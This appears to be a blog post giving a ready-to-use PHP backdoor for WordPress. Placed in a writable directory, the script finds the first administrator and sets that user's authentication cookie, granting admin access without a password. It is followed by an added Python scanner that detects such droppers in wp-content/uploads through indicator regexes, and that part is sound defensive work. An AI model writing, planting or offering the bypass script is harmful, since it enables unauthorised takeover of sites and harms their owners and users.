WordPress Hacking – Revised to be more Automatic

A while back we wrote an article on a WordPress hack showing how simple it is to write a script which, when placed on the server, bypasses the WordPress admin credentials. While that hack will work in most cases (as most people use admin id 1 or expose their admin id as the post “author”), that version only works if you are able to see the admin id.

The following hack is a bit more sophisticated: it uses WordPress’s own functions to search for the first user with the “administrator” role and uses that ID to set the cookie. It also detects whether the script is run over SSL and flags the cookie accordingly. Once the hack is complete, it displays a link that uses the URL configured for the blog as the base, which makes this hack more versatile, as it can be placed in any directory on the site that is writable and can execute scripts (for example “wp-content/uploads”; see our guide on how to prevent this type of hack).

<?php
include('wp-config.php');

// get all administrator users in the database
$admins = new WP_User_Query( array( 'role' => 'administrator', 'orderby' => 'display_name') );

$username = '';

// if admin user is found, execute login hack
if(!empty($admins->results)) {

        foreach($admins->results as $admin) {

                $username = $admin->user_login;

                // set the admin cookie (fake the login without the password)
                wp_set_auth_cookie(
                        // use the first admin user id found
                        $admin->ID,

                        // remember the session
                        1,

                        // use SSL if the site is set to use SSL
                        (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off') ? 1 : 0
                );

                // exit after first object
                break;
        }
}

// check if username was found
if(empty($username)) {
   echo "No administrators found";
   exit();
}

// display link to login
echo "<a href=\"" . WP_HOME . "/wp-admin/\">Click here to login</a> as <b>{$username}</b>";
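From the defender’s side, the practical question is how to notice a script like the one above before anyone uses it. As an added example (not part of the original post and not the post’s script), the Python scanner below walks a wp-content/uploads tree, reports every file the web server might hand to the PHP interpreter, and raises the severity when the source carries the indicators the script above relies on: including wp-config.php, querying the administrator role, and calling wp_set_auth_cookie. The extension list, the indicator regexes and the sample files it creates in a temporary directory are assumptions constructed for this example.

```python
import os
import re
import tempfile

# File names a web server may hand to the PHP interpreter. The list is an
# assumption for this example; extend it to match the server's handler config.
PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".php7", ".phar")

# Source-level indicators of a login-bypass dropper like the one in the post.
# Nothing legitimately stored under wp-content/uploads should need any of them.
SUSPICIOUS_PATTERNS = {
    "wp_config_include": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"][^'\"]*wp-config\.php"),
    "user_query_admin": re.compile(
        r"WP_User_Query[\s\S]{0,200}?['\"]administrator['\"]"),
    "auth_cookie": re.compile(r"\bwp_set_auth_cookie\s*\("),
}


def is_php_candidate(name):
    """True if the web server might execute this file as PHP.

    Besides a final PHP-style extension this also flags names such as
    'x.php.jpg', which Apache setups using AddHandler may still run
    (assumption: mod_mime multiple-extension handling is in effect)."""
    lower = name.lower()
    return lower.endswith(PHP_EXTENSIONS) or ".php." in lower


def scan_uploads(root):
    """Walk an uploads tree and report every PHP candidate with its indicators."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not is_php_candidate(name):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    source = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            indicators = [label for label, rx in SUSPICIOUS_PATTERNS.items()
                          if rx.search(source)]
            findings.append({
                "path": os.path.relpath(path, root).replace(os.sep, "/"),
                "indicators": indicators,
                # any PHP under uploads deserves a look; known indicators raise it
                "severity": "high" if indicators else "medium",
            })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree():
    """Create a constructed uploads tree (not real site data) for a demo run."""
    root = tempfile.mkdtemp(prefix="wp-uploads-")
    samples = {
        "2024/01/photo.jpg": b"\xff\xd8\xff\xe0 constructed jpeg stub",
        "2024/01/dropper.php": (
            "<?php // constructed sample carrying the post's indicator strings\n"
            "include('wp-config.php');\n"
            "$q = new WP_User_Query(array('role' => 'administrator'));\n"
            "wp_set_auth_cookie(0, 1, 0);\n"
        ).encode(),
        "2024/02/index.php": b"<?php // Silence is golden.\n",
        "2024/02/avatar.php.jpg": b"<?php echo 'constructed double-extension sample';\n",
    }
    for rel, content in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for finding in scan_uploads(build_sample_tree()):
        print(f"{finding['severity']:6} {finding['path']}  {finding['indicators']}")
```

Run it against a real tree with scan_uploads("/path/to/wp-content/uploads"). A "medium" finding is not proof of compromise (the empty index.php stub WordPress itself drops into directories shows up that way), so treat the list as triage input; the durable fix is the one the post points to, denying PHP execution under uploads at the web-server level, so that a file like this cannot run even if it gets written.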